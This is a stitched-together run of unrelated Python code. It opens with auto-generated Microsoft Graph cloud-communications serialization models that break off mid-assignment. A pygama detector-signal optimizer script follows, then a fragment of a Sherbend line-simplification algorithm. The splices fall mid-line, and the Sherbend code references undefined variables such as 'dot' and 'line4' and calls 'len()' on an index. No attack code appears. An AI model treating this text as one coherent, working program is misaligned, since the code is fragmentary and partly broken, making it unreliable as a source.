delay. :type maximum_inbound_round_trip_delay: ~datetime.timedelta :param maximum_outbound_jitter: The maximum outbound stream network jitter. :type maximum_outbound_jitter: ~datetime.timedelta :param maximum_outbound_packet_loss_rate_in_percentage: The maximum outbound stream packet loss rate in percentage (0-100). For example, 0.01 means 0.01%. :type maximum_outbound_packet_loss_rate_in_percentage: float :param maximum_outbound_round_trip_delay: The maximum outbound stream network round trip delay. :type maximum_outbound_round_trip_delay: ~datetime.timedelta :param media_duration: The total modality duration. If the media enabled and disabled multiple times, MediaDuration will the summation of all of the durations. :type media_duration: ~datetime.timedelta :param network_link_speed_in_bytes: The network link speed in bytes. :type network_link_speed_in_bytes: long :param outbound_packets: The total number of the outbound packets. :type outbound_packets: long :param remote_ip_address: The remote IP address for the media session. :type remote_ip_address: str :param remote_port: The remote media port. 
:type remote_port: int """ _validation = { 'channel_index': {'maximum': 2147483647, 'minimum': -2147483648}, 'local_port': {'maximum': 2147483647, 'minimum': -2147483648}, 'remote_port': {'maximum': 2147483647, 'minimum': -2147483648}, } _attribute_map = { 'additional_properties': {'key': '', 'type': '{object}'}, 'average_inbound_jitter': {'key': 'averageInboundJitter', 'type': 'duration'}, 'average_inbound_packet_loss_rate_in_percentage': {'key': 'averageInboundPacketLossRateInPercentage', 'type': 'float'}, 'average_inbound_round_trip_delay': {'key': 'averageInboundRoundTripDelay', 'type': 'duration'}, 'average_outbound_jitter': {'key': 'averageOutboundJitter', 'type': 'duration'}, 'average_outbound_packet_loss_rate_in_percentage': {'key': 'averageOutboundPacketLossRateInPercentage', 'type': 'float'}, 'average_outbound_round_trip_delay': {'key': 'averageOutboundRoundTripDelay', 'type': 'duration'}, 'channel_index': {'key': 'channelIndex', 'type': 'int'}, 'inbound_packets': {'key': 'inboundPackets', 'type': 'long'}, 'local_ip_address': {'key': 'localIPAddress', 'type': 'str'}, 'local_port': {'key': 'localPort', 'type': 'int'}, 'maximum_inbound_jitter': {'key': 'maximumInboundJitter', 'type': 'duration'}, 'maximum_inbound_packet_loss_rate_in_percentage': {'key': 'maximumInboundPacketLossRateInPercentage', 'type': 'float'}, 'maximum_inbound_round_trip_delay': {'key': 'maximumInboundRoundTripDelay', 'type': 'duration'}, 'maximum_outbound_jitter': {'key': 'maximumOutboundJitter', 'type': 'duration'}, 'maximum_outbound_packet_loss_rate_in_percentage': {'key': 'maximumOutboundPacketLossRateInPercentage', 'type': 'float'}, 'maximum_outbound_round_trip_delay': {'key': 'maximumOutboundRoundTripDelay', 'type': 'duration'}, 'media_duration': {'key': 'mediaDuration', 'type': 'duration'}, 'network_link_speed_in_bytes': {'key': 'networkLinkSpeedInBytes', 'type': 'long'}, 'outbound_packets': {'key': 'outboundPackets', 'type': 'long'}, 'remote_ip_address': {'key': 
'remoteIPAddress', 'type': 'str'}, 'remote_port': {'key': 'remotePort', 'type': 'int'}, } def __init__( self, **kwargs ): super(MicrosoftGraphTeleconferenceDeviceMediaQuality, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) self.average_inbound_jitter = kwargs.get('average_inbound_jitter', None) self.average_inbound_packet_loss_rate_in_percentage = kwargs.get('average_inbound_packet_loss_rate_in_percentage', None) self.average_inbound_round_trip_delay = kwargs.get('average_inbound_round_trip_delay', None) self.average_outbound_jitter = kwargs.get('average_outbound_jitter', None) self.average_outbound_packet_loss_rate_in_percentage = kwargs.get('average_outbound_packet_loss_rate_in_percentage', None) self.average_outbound_round_trip_delay = kwargs.get('average_outbound_round_trip_delay', None) self.channel_index = kwargs.get('channel_index', None) self.inbound_packets = kwargs.get('inbound_packets', None) self.local_ip_address = kwargs.get('local_ip_address', None) self.local_port = kwargs.get('local_port', None) self.maximum_inbound_jitter = kwargs.get('maximum_inbound_jitter', None) self.maximum_inbound_packet_loss_rate_in_percentage = kwargs.get('maximum_inbound_packet_loss_rate_in_percentage', None) self.maximum_inbound_round_trip_delay = kwargs.get('maximum_inbound_round_trip_delay', None) self.maximum_outbound_jitter = kwargs.get('maximum_outbound_jitter', None) self.maximum_outbound_packet_loss_rate_in_percentage = kwargs.get('maximum_outbound_packet_loss_rate_in_percentage', None) self.maximum_outbound_round_trip_delay = kwargs.get('maximum_outbound_round_trip_delay', None) self.media_duration = kwargs.get('media_duration', None) self.network_link_speed_in_bytes = kwargs.get('network_link_speed_in_bytes', None) self.outbound_packets = kwargs.get('outbound_packets', None) self.remote_ip_address = kwargs.get('remote_ip_address', None) self.remote_port = kwargs.get('remote_port', None) class 
MicrosoftGraphTeleconferenceDeviceQuality(msrest.serialization.Model): """teleconferenceDeviceQuality. :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] :param call_chain_id: A unique identifier for all the participant calls in a conference or a unique identifier for two participant calls in P2P call. This needs to be copied over from Microsoft.Graph.Call.CallChainId. :type call_chain_id: str :param cloud_service_deployment_environment: A geo-region where the service is deployed, such as ProdNoam. :type cloud_service_deployment_environment: str :param cloud_service_deployment_id: A unique deployment identifier assigned by Azure. :type cloud_service_deployment_id: str :param cloud_service_instance_name: The Azure deployed cloud service instance name, such as FrontEnd_IN_3. :type cloud_service_instance_name: str :param cloud_service_name: The Azure deployed cloud service name, such as contoso.cloudapp.net. :type cloud_service_name: str :param device_description: Any additional description, such as VTC Bldg 30/21. :type device_description: str :param device_name: The user media agent name, such as Cisco SX80. :type device_name: str :param media_leg_id: A unique identifier for a specific media leg of a participant in a conference. One participant can have multiple media leg identifiers if retargeting happens. CVI partner assigns this value. :type media_leg_id: str :param media_quality_list: The list of media qualities in a media session (call), such as audio quality, video quality, and/or screen sharing quality. :type media_quality_list: list[~cloud_communications.models.MicrosoftGraphTeleconferenceDeviceMediaQuality] :param participant_id: A unique identifier for a specific participant in a conference. The CVI partner needs to copy over Call.MyParticipantId to this property. 
:type participant_id: str """ _attribute_map = { 'additional_properties': {'key': '', 'type': '{object}'}, 'call_chain_id': {'key': 'callChainId', 'type': 'str'}, 'cloud_service_deployment_environment': {'key': 'cloudServiceDeploymentEnvironment', 'type': 'str'}, 'cloud_service_deployment_id': {'key': 'cloudServiceDeploymentId', 'type': 'str'}, 'cloud_service_instance_name': {'key': 'cloudServiceInstanceName', 'type': 'str'}, 'cloud_service_name': {'key': 'cloudServiceName', 'type': 'str'}, 'device_description': {'key': 'deviceDescription', 'type': 'str'}, 'device_name': {'key': 'deviceName', 'type': 'str'}, 'media_leg_id': {'key': 'mediaLegId', 'type': 'str'}, 'media_quality_list': {'key': 'mediaQualityList', 'type': '[MicrosoftGraphTeleconferenceDeviceMediaQuality]'}, 'participant_id': {'key': 'participantId', 'type': 'str'}, } def __init__( self, **kwargs ): super(MicrosoftGraphTeleconferenceDeviceQuality, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) self.call_chain_id = kwargs.get('call_chain_id', None) self.cloud_service_deployment_environment = kwargs.get('cloud_service_deployment_environment', None) self.cloud_service_deployment_id = kwargs.get('cloud_service_deployment_id', None) self.cloud_service_instance_name = kwargs.get('cloud_service_instance_name', None) self.cloud_service_name = kwargs.get('cloud_service_name', None) self.device_description = kwargs.get('device_description', None) self.device_name = kwargs.get('device_name', None) self.media_leg_id = kwargs.get('media_leg_id', None) self.media_quality_list = kwargs.get('media_quality_list', None) self.participant_id = kwargs.get('participant_id', None) class MicrosoftGraphToneInfo(msrest.serialization.Model): """toneInfo. :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] :param sequence_id: An incremental identifier used for ordering DTMF events. 
    :type sequence_id: long
    :param tone: Possible values include: "tone0", "tone1", "tone2", "tone3",
     "tone4", "tone5", "tone6", "tone7", "tone8", "tone9", "star", "pound",
     "a", "b", "c", "d", "flash".
    :type tone: str or ~cloud_communications.models.MicrosoftGraphTone
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'sequence_id': {'key': 'sequenceId', 'type': 'long'},
        'tone': {'key': 'tone', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(MicrosoftGraphToneInfo, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties', None)
        self.sequence_id = kwargs.get('sequence_id', None)
        self.tone = kwargs.get('tone', None)


# NOTE(review): these model classes appear to be auto-generated msrest
# serialization models (Microsoft Graph cloud communications) — confirm the
# generator before hand-editing, as changes may be overwritten.
class MicrosoftGraphUnmuteParticipantOperation(MicrosoftGraphCommsOperation):
    """unmuteParticipantOperation.

    :param id: Read-only.
    :type id: str
    :param client_context: Unique Client Context string. Max limit is 256
     chars.
    :type client_context: str
    :param result_info: ResultInfo.
    :type result_info: ~cloud_communications.models.MicrosoftGraphResultInfo
    :param status: Possible values include: "NotStarted", "Running",
     "Completed", "Failed".
    :type status: str or
     ~cloud_communications.models.MicrosoftGraphOperationStatus
    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    """

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
        'result_info': {'key': 'resultInfo', 'type': 'MicrosoftGraphResultInfo'},
        'status': {'key': 'status', 'type': 'str'},
        'additional_properties': {'key': '', 'type': '{object}'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(MicrosoftGraphUnmuteParticipantOperation, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties', None)


class MicrosoftGraphUpdateRecordingStatusOperation(MicrosoftGraphCommsOperation):
    """updateRecordingStatusOperation.

    :param id: Read-only.
    :type id: str
    :param client_context: Unique Client Context string. Max limit is 256
     chars.
    :type client_context: str
    :param result_info: ResultInfo.
    :type result_info: ~cloud_communications.models.MicrosoftGraphResultInfo
    :param status: Possible values include: "NotStarted", "Running",
     "Completed", "Failed".
    :type status: str or
     ~cloud_communications.models.MicrosoftGraphOperationStatus
    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    """

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'client_context': {'key': 'clientContext', 'type': 'str'},
        'result_info': {'key': 'resultInfo', 'type': 'MicrosoftGraphResultInfo'},
        'status': {'key': 'status', 'type': 'str'},
        'additional_properties': {'key': '', 'type': '{object}'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(MicrosoftGraphUpdateRecordingStatusOperation, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties', None)


class OdataError(msrest.serialization.Model):
    """OdataError.

    All required parameters must be populated in order to send to Azure.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param error: Required.
    :type error: ~cloud_communications.models.OdataErrorMain
    """

    _validation = {
        'error': {'required': True},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'error': {'key': 'error', 'type': 'OdataErrorMain'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(OdataError, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties', None)
        # 'error' is required — a missing kwarg raises KeyError by design.
        self.error = kwargs['error']


class OdataErrorDetail(msrest.serialization.Model):
    """OdataErrorDetail.

    All required parameters must be populated in order to send to Azure.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param code: Required.
    :type code: str
    :param message: Required.
    :type message: str
    :param target:
    :type target: str
    """

    _validation = {
        'code': {'required': True},
        'message': {'required': True},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
        'target': {'key': 'target', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(OdataErrorDetail, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties', None)
        # 'code' and 'message' are required — missing kwargs raise KeyError.
        self.code = kwargs['code']
        self.message = kwargs['message']
        self.target = kwargs.get('target', None)


class OdataErrorMain(msrest.serialization.Model):
    """OdataErrorMain.

    All required parameters must be populated in order to send to Azure.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param code: Required.
    :type code: str
    :param message: Required.
    :type message: str
    :param target:
    :type target: str
    :param details:
    :type details: list[~cloud_communications.models.OdataErrorDetail]
    :param innererror: The structure of this object is service-specific.
    :type innererror: dict[str, object]
    """

    _validation = {
        'code': {'required': True},
        'message': {'required': True},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
        'target': {'key': 'target', 'type': 'str'},
        'details': {'key': 'details', 'type': '[OdataErrorDetail]'},
        'innererror': {'key': 'innererror', 'type': '{object}'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(OdataErrorMain, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties', None)
        self.code = kwargs['code']
        self.message = kwargs['message']
        self.target =
#!/usr/bin/env python3
import os
import argparse
import time
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('clint.mpl')
from pprint import pprint
import scipy.signal as signal
import itertools

from pygama import DataSet
import pygama.utils as pu
import pygama.analysis.histograms as ph
import pygama.analysis.peak_fitting as pf


def main():
    """
    to get the best energy resolution, we want to explore the possible values
    of our DSP processor list, especially trap filter and RC decay constants.

    a flexible + easy way to vary a bunch of parameters at once is to create
    a DataFrame with each row corresponding to a set of parameters.
    We then use this DF as an input/output for the other functions.

    it could also easily be extended to loop over individual detectors, or
    vary any other set of parameters in the processor list ......
    """
    par = argparse.ArgumentParser(description="pygama dsp optimizer")
    arg, st, sf = par.add_argument, "store_true", "store_false"
    arg("-ds", nargs='*', action="store", help="load runs for a DS")
    arg("-r", "--run", nargs=1, help="load a single run")
    arg("-g", "--grid", action=st, help="set DSP parameters to be varied")
    arg("-w", "--window", action=st, help="generate a small waveform file")
    arg("-p", "--process", action=st, help="run DSP processing")
    arg("-f", "--fit", action=st, help="fit outputs to peakshape function")
    arg("-t", "--plot", action=st, help="find optimal parameters & make plots")
    arg("-v", "--verbose", action=st, help="set verbose mode")
    args = vars(par.parse_args())

    ds = pu.get_dataset_from_cmdline(args, "runDB.json", "calDB.json")
    # pprint(ds.paths)

    # set I/O locations
    d_out = os.path.expanduser('~') + "/Data/cage"
    f_grid = f"{d_out}/cage_optimizer_grid.h5"
    f_tier1 = f"{d_out}/cage_optimizer_t1.h5"
    f_tier2 = f"{d_out}/cage_optimizer_t2.h5"
    f_opt = f"{d_out}/cage_optimizer_data.h5"

    # -- run routines --
    if args["grid"]:
        # set the combination of processor params to vary to optimize resolution
        set_grid(f_grid)

    if args["window"]:
        # generate a small single-peak file w/ uncalibrated energy to reanalyze
        window_ds(ds, f_tier1)

    if args["process"]:
        # create a file with DataFrames for each set of parameters
        process_ds(ds, f_grid, f_opt, f_tier1, f_tier2)

    if args["fit"]:
        # fit all outputs to the peakshape function and find the best resolution
        get_fwhm(f_grid, f_opt, verbose=args["verbose"])

    if args["plot"]:
        # show results
        plot_fwhm(f_grid)


def set_grid(f_grid):
    """
    Build the master grid of DSP parameter combinations (trap rise, trap
    flat, RC decay constant) and write it to the HDF5 file `f_grid`, one row
    per combination.
    """
    # # this is pretty ambitious, but maybe doable -- 3500 entries
    # e_rises = np.arange(1, 6, 0.2)
    # e_flats = np.arange(0.5, 4, 0.5)
    # rc_consts = np.arange(50, 150, 5)  # ~same as MJD charge trapping correction

    # this runs more quickly -- 100 entries, 3 minutes on my mac
    e_rises = np.arange(2, 3, 0.2)
    e_flats = np.arange(1, 3, 1)
    rc_consts = np.arange(52, 152, 10)

    # TODO: jason's suggestions, knowing the expected shape of the noise curve
    # e_rises = np.linspace(-1, 0, sqrt(sqrt(3))  # jason says try this
    # e_rises  # make another list which is 10^pwr of this list
    # np.linspace(log_tau_min, log_tau_max)  # jason says try this too

    # Cartesian product: one row per (rise, flat, rc) combination
    lists = [e_rises, e_flats, rc_consts]
    prod = list(itertools.product(*lists))  # clint <3 stackoverflow
    df = pd.DataFrame(prod, columns=['rise','flat','rc'])
    # print(df)
    df.to_hdf(f_grid, key="pygama_optimization")
    print("Wrote master grid file:", f_grid)


def window_ds(ds, f_tier1):
    """
    Take a single DataSet and window it so that the output file only contains
    events near an expected peak location.
    """
    # a user has to figure out the uncalibrated energy range of the K40 peak
    # xlo, xhi, xpb = 0, 2e6, 2000  # show phys. spectrum (top feature is 2615 pk)
    xlo, xhi, xpb = 990000, 1030000, 250  # k40 peak, ds 3

    t2df = ds.get_t2df()
    hE, xE = ph.get_hist(t2df["energy"], range=(xlo, xhi), dx=xpb)
    plt.semilogy(xE, hE, ls='steps', lw=1, c='r')

    import matplotlib.ticker as ticker
    plt.gca().xaxis.set_major_formatter(ticker.FormatStrFormatter('%0.4e'))
    plt.locator_params(axis='x', nbins=5)

    plt.xlabel("Energy (uncal.)", ha='right', x=1)
    plt.ylabel("Counts", ha='right', y=1)
    plt.savefig(f"./plots/cage_ds{ds.ds_lo}_winK40.pdf")
    # exit()

    # write a windowed tier 1 file containing only waveforms near the peak
    t1df = pd.DataFrame()
    for run in ds.paths:
        ft1 = ds.paths[run]["t1_path"]
        print(f"Scanning ds {ds.ds_lo}, run {run}\n file: {ft1}")
        # NOTE(review): chunksize=5e4 is a float; pandas expects an int here —
        # confirm this works on the pandas version in use.
        for chunk in pd.read_hdf(ft1, 'ORSIS3302DecoderForEnergy', chunksize=5e4):
            t1df_win = chunk.loc[(chunk.energy > xlo) & (chunk.energy < xhi)]
            print(t1df_win.shape)
            t1df = pd.concat([t1df, t1df_win], ignore_index=True)

    # -- save to HDF5 output file --
    h5_opts = {
        "mode":"w", # overwrite existing
        "append":False,
        "format":"table",
        # "complib":"blosc:zlib", # no compression, increases I/O speed
        # "complevel":1,
        # "data_columns":["ievt"]
    }
    t1df.reset_index(inplace=True)
    t1df.to_hdf(f_tier1, key="df_windowed", **h5_opts)
    print("wrote file:", f_tier1)


def process_ds(ds, f_grid, f_opt, f_tier1, f_tier2):
    """
    Run the tier-1 DSP processing once per row of the parameter grid,
    and determine the trapezoid parameters that minimize the FWHM of the peak
    (fitting to the peakshape function).

    NOTE: I don't think we need to multiprocess this, since that's already
    being done in ProcessTier1
    """
    from pygama.dsp.base import Intercom
    from pygama.io.tier1 import ProcessTier1
    import pygama.io.decoders.digitizers as pgd

    df_grid = pd.read_hdf(f_grid)

    # start from a clean output file
    if os.path.exists(f_opt):
        os.remove(f_opt)

    # check the windowed file
    # tmp = pd.read_hdf(f_tier1)
    # nevt = len(tmp)

    t_start = time.time()
    for i, row in df_grid.iterrows():

        # estimate remaining time in scan (after the first 5 rows)
        if i == 4:
            diff = time.time() - t_start
            tot = diff/5 * len(df_grid) / 60
            tot -= diff / 60
            print(f"Estimated remaining time: {tot:.2f} mins")

        rise, flat, rc = row
        print(f"Row {i}/{len(df_grid)}, rise {rise} flat {flat} rc {rc}")

        # custom tier 1 processor list -- very minimal
        proc_list = {
            "clk" : 100e6,
            "fit_bl" : {"ihi":500, "order":1},
            "blsub" : {},
            "trap" : [
                {"wfout":"wf_etrap", "wfin":"wf_blsub",
                 "rise":rise, "flat":flat, "decay":rc},
                {"wfout":"wf_atrap", "wfin":"wf_blsub",
                 "rise":0.04, "flat":0.1, "fall":2}  # could vary these too
                ],
            "get_max" : [{"wfin":"wf_etrap"}, {"wfin":"wf_atrap"}],
            # "ftp" : {"test":1}
            "ftp" : {}
        }
        proc = Intercom(proc_list)

        # point the decoder at the windowed tier-1 table
        dig = pgd.SIS3302Decoder
        dig.decoder_name = "df_windowed"
        dig.class_name = None

        out_dir = "/".join(f_tier2.split("/")[:-1])

        # process silently
        ProcessTier1(f_tier1, proc, output_dir=out_dir, overwrite=True,
                     verbose=False, multiprocess=True, nevt=np.inf, ioff=0,
                     chunk=ds.config["chunksize"], run=ds.runs[0],
                     t2_file=f_tier2, digitizers=[dig])

        # load the temporary file and append to the main output file,
        # one HDF5 key per grid row
        df_key = f"opt_{i}"
        t2df = pd.read_hdf(f_tier2)
        t2df.to_hdf(f_opt, df_key)


def get_fwhm(f_grid, f_opt, verbose=False):
    """
    duplicate the plot from Figure 2.7 of Kris Vorren's thesis (and much more!)

    this code fits the e_ftp peak to the HPGe peakshape function (same as in
    calibration.py) and writes a new column to df_grid, "fwhm".
    """
    df_grid = pd.read_hdf(f_grid)

    # declare some new columns for df_grid
    cols = ["fwhm", "rchi2"]
    for col in cols:
        df_grid[col] = np.nan

    # loop over the keys and fit each e_ftp spectrum to the peakshape function
    print("i rise flat rc fwhm rchi2")
    for i, row in df_grid.iterrows():

        key = f"opt_{i}"
        t2df = pd.read_hdf(f_opt, key=f"opt_{i}")

        # auto-histogram spectrum near the uncalibrated peak
        hE, xE, vE = ph.get_hist(t2df["e_ftp"], bins=1000, trim=False)

        # shift the histogram to be roughly centered at 0 and symmetric
        mu = xE[np.argmax(hE)]
        xE -= mu

        # estimate sigma from the half-maximum width, then trim the
        # histogram to +/- 8 sigma around the peak
        imax = np.argmax(hE)
        hmax = hE[imax]
        idx = np.where(hE > hmax/2)  # fwhm
        ilo, ihi = idx[0][0], idx[0][-1]
        sig = (xE[ihi] - xE[ilo]) / 2.355
        idx = np.where((xE > -8 * sig) & (xE < 8 * sig))
        ilo, ihi = idx[0][0], idx[0][-1]-1
        xE = xE[ilo-1:ihi]
        hE, vE = hE[ilo:ihi], vE[ilo:ihi]
        # plt.plot(xE[1:], hE, ls='steps', c='r', lw=3)
        # plt.show()
        # exit()

        # set initial guesses for the peakshape function.  could all be improved
        mu = 0
        sigma = 5  # radford uses an input linear function
        hstep = 0.001
        htail = 0.5
        tau = 10
        bg0 = np.mean(hE[:20])
        amp = np.sum(hE)
        x0 = [mu, sigma, hstep, htail, tau, bg0, amp]

        xF, xF_cov = pf.fit_hist(pf.radford_peak, hE, xE, var=vE, guess=x0)

        # goodness of fit (Pearson-style chi^2 per bin)
        chisq = []
        for j, h in enumerate(hE):
            model = pf.radford_peak(xE[j], *xF)
            diff = (model - h)**2 / model
            chisq.append(abs(diff))

        # update the master dataframe: FWHM = 2.355 * fitted sigma
        fwhm = xF[1] * 2.355
        rchi2 = sum(np.array(chisq) / len(hE))
        df_grid.at[i, "fwhm"] = fwhm
        df_grid.at[i, "rchi2"] = rchi2

        rise, flat, rc = row[:3]
        label = f"{i} {rise:.2f} {flat:.2f} {rc:.0f} {fwhm:.2f} {rchi2:.2f}"
        print(label)

        if verbose:
            # plot every dang fit
            plt.cla()

            # peakshape function
            plt.plot(xE, pf.radford_peak(xE, *x0), c='orange', label='guess')
            plt.plot(xE, pf.radford_peak(xE, *xF), c='r', label='peakshape')
            plt.axvline(mu, c='g')

            # plot individual components
            # tail_hi, gaus, bg, step, tail_lo = pf.radford_peak(xE, *xF, components=True)
            # gaus = np.array(gaus)
            # step = np.array(step)
            # tail_lo = np.array(tail_lo)
            # plt.plot(xE, gaus * tail_hi, ls="--", lw=2, c='g', label="gaus+hi_tail")
            # plt.plot(xE, step
Parameters ---------- None Returns ------- float Length of the perimeter """ try: return self._perimeter except AttributeError: self._perimeter = self.polygon.length return self._perimeter @property def cmp_index(self): """Calculates the value of the compactness index Parameters ---------- None Returns ------- float Value of the compactness index """ try: return self._cmp_index except AttributeError: self._cmp_index = GenUtil.calculate_compactness_index(self.area, self.perimeter) return self._cmp_index @property def adj_area(self): """Calculates the value of the compactness index of the polygon Parameters ---------- None Returns ------- float Value of the compactness index """ try: return self._adj_area except AttributeError: self._adj_area = GenUtil.calculate_adjusted_area(self.area, self.cmp_index) return self._adj_area @property def replacement_line(self): """Calculates the replacement line of the bend Parameters ---------- None Returns ------- LineString Replacement line for the bend """ try: return self._replacement_line except AttributeError: self._replacement_line = LineString((self.bend_coords[0], self.bend_coords[-1])) return self._replacement_line def create_replacement_line (lst_coords, bend, diameter): """Calculate the replacement line for a bend""" # Extract the sub line containing the bend with one extra vertice on each side sub_line = LineStringSb(lst_coords[bend.i-1:bend.j+1]) bend_i = 1 bend_j = len(bend.j)-1 # Translate to sub line so that the bend starts at 0,0 xoff, yoff = lst_coords[bend.i][0], lst_coords[bend.i][1] line_translate = affinity.affine_transform(sub_line, [1, 0, 0, 1, -xoff, -yoff]) # Extract the angle between the base of the bend (bendi, bendj) and the x axis lst_coord = list(line_translate.coords) p0 = (lst_coord[bend_j][0], lst_coord[bend_j][1]) p1 = (lst_coord[bend_i][0], lst_coord[bend_i][1]) p2 = (abs(p0[0])+1., 0) angle = GenUtil.angle_vecor(p0, p1, p2) # p0_x = line1_coord[bend_j][0] # p0_y = line1_coord[bend_j][1] # p1_x = 
abs(p0_x) + 1. # In case x == 0 # p1_y = 0. # dot = p0_x * p1_x + p0_y * p1_y # len_a = (p0_x ** 2 + p0_y ** 2) ** .5 # len_b = (p1_x ** 2 + p1_y ** 2) ** .5 angle = math.acos(dot / (len_a * len_b)) angle = (angle * 180 / math.pi) if p0[1] >= 0.: angle = -angle # Clockwise rotation # if p0_y >= 0.: # angle = -angle # Rotate the bend so it's on the x axis a = math.cos(angle) b = -math.sin(angle) d = math.sin(angle) e = math.cos(angle) line_rotate = affinity.rotate(line_translate, angle, origin=(0, 0)) lst_coords = list(line_rotate.coords) # line_i = LineString(lst_coords[0:3]) # line_j = LineString(lst_coords[-2:]) # Calculate the angle between the base of the bend of segment before and after the bend theta_i = lib_geobato.GenUtil.compute_angle(lst_coords[0], lst_coords[1], lst_coords[bend_j]) theta_j = lib_geobato.GenUtil.compute_angle(lst_coords[bend_j], lst_coords[-2], lst_coords[-1]) # Determine if the bend_line = LineString(lst_coord[bend_i:bend_j+1]) (minx, miny, maxx, maxy) = bend_line.bounds y_dynamic = (abs(miny) + abs(maxy)) * 10. x_middle = (lst_coords[bend_i][0] + lst_coords[bend_j][0]) / 2. line_y_positive = LineString(((x_middle, 0), (x_middle, y_dynamic))) line_y_negative = LineString(((x_middle, 0), (x_middle, -y_dynamic))) if line4.crosses(line_y_positive): bend_side = +1 else: if line4.crosses(line_y_negative): bend_side = -1 if lst_coords[0][1] >= 0.: start_line_side = 1 else: start_line_side = -1 if lst_coords[-1][1] >= 0.: end_line_side = 1 else: end_line_side = -1 if (start_line_side * end_line_side == -1): print("Nothing to do....") line5 = LineString(lst_coords[0:bend_i + 1] + lst_coords[bend_j:]) else: # Both line are on the same side if start_line_side == 1 and end_line_side == 1: if bend_side == -1: angle_bias = 2. y_offset = -1 else: angle_bias = 3. y_offset = 1 if start_line_side == -1 and end_line_side == -1: if bend_side == 1: angle_bias = 2. y_offset = 1 else: angle_bias = 3. y_offset = 1 theta_i = (180. 
- theta_i) / angle_bias if theta_i >= 5.: hypothenus = x_middle / math.cos(theta_i * math.pi / 180.) y_height = math.sqrt(hypothenus ** 2 - x_middle ** 2) if bend_side == -1: y_height *= y_offset new_coord = (x_middle, y_height) line5 = LineString(lst_coords[0:bend_i + 1] + [new_coord] + lst_coords[bend_j:]) else: print("Nothing to do....") line5 = LineString(lst_coords[0:bend_i + 1] + lst_coords[bend_j:]) class AlgoSherbend(object): """Main class for the Sherbend algorithm Attributes: - None """ def __init__(self, command, geo_content): """Constructor of the class Parameters ---------- command : DataClass Contains all the commands for the Sherbend line simplification algorithm geo_content: DataClass Contains the geo information needed for the the sherbend line reduction algorithm Returns ------- None """ self.command = command self.geo_content = geo_content self.nbr_bend_simplified = 0 def calculate_min_adj_area(self, diameter): """Calculates the minimum adjusted area of a band Parameters ---------- diameter : float diameter used to calculate the minimum adjusted area Returns ------- float Minimum adjusted area """ return (_AREA_CMP_INDEX * math.pi * (diameter/2.0)**2.0) def _calculate_adj_area(self, coords): """Calculates the adjusted area of a polygon Parameters ---------- coords : list List of x,y coordinates defining a polygon Returns ------- float Minimum adjusted area """ pol = Polygon(coords) cmp_index = GenUtil.calculate_compactness_index(pol.area, pol.length) adj_area = GenUtil.calculate_adjusted_area(pol.area, cmp_index) return adj_area def load_features(self, geo_content, command): """Load the points, line strings and polygons in the spatial container. 
The Polygons are deconstructued into a list LineString with clockwise orientation and extra added information needed for the reconstruction of the original Polygon Parameters ---------- geo_content : DataClass Contains all the input#output geo spatial information command :ParserArgument Contains the parameters of the command line interface Returns ------- None """ features = [] # List of features to pass to the spatial container # Load all the features in the spatial container for feature in geo_content.in_features: diameter = command.dlayer_dict[feature.sb_layer_name] min_adj_area = self.calculate_min_adj_area(diameter) if feature.geom_type == GenUtil.POINT: out_feature = PointSb(feature.coords, feature.sb_layer_name, feature.sb_properties) # Add the feature features.append(out_feature) elif feature.geom_type == GenUtil.LINE_STRING: out_feature = out_feature = LineStringSb(feature.coords, GenUtil.LINE_STRING, min_adj_area, feature.sb_layer_name, feature.sb_properties) # Add the feature features.append(out_feature) elif feature.geom_type == GenUtil.POLYGON: adj_area = self._calculate_adj_area(feature.exterior.coords) # Only keep the polygon over the minimum adjusted area if not command.exclude_polygon or adj_area > min_adj_area: # Deconstruct the Polygon into a list of LineString with supplementary information # needed to reconstruct the original Polygon ext_feature = LineStringSb(feature.exterior.coords, GenUtil.POLYGON_EXTERIOR, min_adj_area, feature.sb_layer_name, feature.sb_properties) interiors = feature.interiors int_features = [] # Extract the interiors as LineString for interior in interiors: adj_area = self._calculate_adj_area(interior.coords) # Only keep the interior (hole) over the minimal adjusted area if not command.exclude_hole or adj_area > min_adj_area: interior = LineStringSb(interior.coords, GenUtil.POLYGON_INTERIOR, min_adj_area, None, None) int_features.append(interior) else: geo_content.nbr_del_holes += len(feature.interiors) # Add interior 
